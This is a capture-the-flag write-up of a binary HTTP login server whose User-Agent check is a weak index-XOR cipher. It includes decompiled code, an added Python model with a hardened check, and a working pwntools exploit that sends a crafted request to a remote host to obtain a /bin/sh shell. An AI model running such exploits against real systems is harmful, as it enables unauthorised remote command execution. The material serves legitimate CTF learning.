This post was last edited by Xor0ne on 2020-3-31 16:27
3.7Z
Source: ichunqiu
Challenge: nc 106.75.2.53 80 Attachment download:
Writeup
Source: https://www.ichunqiu.com/writeup/detail/525
```
➜ workspace file http
http: ELF 32-bit LSB executable, Intel 80386, version 1 (SYSV), dynamically linked, interpreter /lib/ld-linux.so.2, for GNU/Linux 2.6.24, BuildID[sha1]=e013437b38841afd4ac166fcba1a25b553ba9028, stripped
➜ workspace checksec http
[*] '/Users/apple/Binary/CTF/Shooting/ichun/Pwn/3.7Z/workspace/http'
    Arch:     i386-32-little
    RELRO:    Partial RELRO
    Stack:    Canary found
    NX:       NX enabled
    PIE:      No PIE (0x8048000)
```
A fairly easy challenge: the binary is an HTTP login server.
We send an HTTP request; the value after the `User-Agent:` header is checked by the `judge` function, and if it passes, the command given under `token:` is executed. `judge` is a very simple XOR cipher with a weak key, so the whole thing amounts to a backdoor that hands out a shell directly.
```c
signed int __cdecl judge(int a1)
{
  signed int i;  // [esp+18h] [ebp-10h]
  signed int v3; // [esp+1Ch] [ebp-Ch]

  v3 = strlen(s);                      // s: global key string stored in the binary
  for ( i = 0; i < v3; ++i )
  {
    // byte i of the input, XORed with its index, must equal s[i]
    if ( (i ^ *(char *)(i + a1)) != s[i] )
      return 0;
  }
  return 1;
}
```
There are other bugs as well, such as a format string vulnerability, but we simply exploit the weak key: build the HTTP request and inject the command we want to execute.
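To make the weakness concrete, here is an added Python model of the binary's `judge()` check (this is not the writeup's code or the challenge binary). It assumes, from the writeup's `login('useragent')`, that the global string `s` in the binary is `"useragent"`; that value is inferred, not read from the binary. The `judge_hardened` variant and the `expected_sha256` parameter are constructed alternatives showing how a defender would check a value that is not derivable from the binary itself.

```python
#!/usr/bin/env python3
"""Added example (not from the original writeup): a Python model of the
binary's judge() check, showing why XOR-with-index "encryption" of the
User-Agent value gives no protection, and a constructed hardened check."""
import hashlib
import hmac

# Assumed value of the binary's global s: the writeup's login('useragent')
# only passes judge() if s == "useragent". Inferred, not taken from the binary.
KEY = "useragent"


def xor_index(data):
    """The writeup's login(): XOR each byte with its index. Applying it twice
    returns the original, so the transform is its own inverse."""
    return "".join(chr(i ^ ord(c)) for i, c in enumerate(data))


def judge(key, data):
    """Mirror of the decompiled judge(): return 1 iff (i ^ data[i]) == key[i]
    for every i < strlen(key). Input shorter than the key is rejected here
    instead of reading past the buffer as the C code would."""
    if len(data) < len(key):
        return 0
    for i, k in enumerate(key):
        if (i ^ ord(data[i])) != ord(k):
            return 0
    return 1


def accepted_user_agent(key):
    """Anyone holding the binary (and therefore s) computes the only value
    judge() accepts: byte i must be key[i] ^ i. No secret is involved."""
    return xor_index(key)


def sha256_hex(value):
    """Hex SHA-256 of a text value (helper for the hardened check)."""
    return hashlib.sha256(value.encode()).hexdigest()


def judge_hardened(expected_sha256, data):
    """Constructed alternative: compare a hash of the presented value against
    a digest supplied at deploy time rather than compiled into the binary,
    using a constant-time comparison."""
    return 1 if hmac.compare_digest(sha256_hex(data), expected_sha256) else 0


if __name__ == "__main__":
    ua = accepted_user_agent(KEY)
    print("accepted User-Agent value:", repr(ua))        # 'urgqebci|'
    print("judge accepts it:", judge(KEY, ua))           # 1
    print("judge rejects the raw key:", judge(KEY, KEY)) # 0
```

Running the script shows that the only accepted `User-Agent` value is a fixed transform of the constant in the binary, which is exactly what the writeup's `login()` computes; the check has no secret input at all.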
```python
#!/usr/bin/env python
from pwn import *

context.binary = './http'
context.terminal = ['tmux', 'sp', '-h']
context.log_level = 'debug'


def login(data):
    # judge() accepts byte i only if (i ^ byte) == s[i], so send s[i] ^ i for each i
    payload = ''
    for i in range(len(data)):
        payload += chr(i ^ ord(data[i]))
    return payload


# io = process('./http')          # local test
io = remote('106.75.93.221', 80)

payload = 'User-Agent: ' + login('useragent')
print(payload)
payload += 'token: ' + '/bin/sh'  # command executed once judge() passes
payload += '\r\n\r\n'
io.send(payload)
io.interactive()
```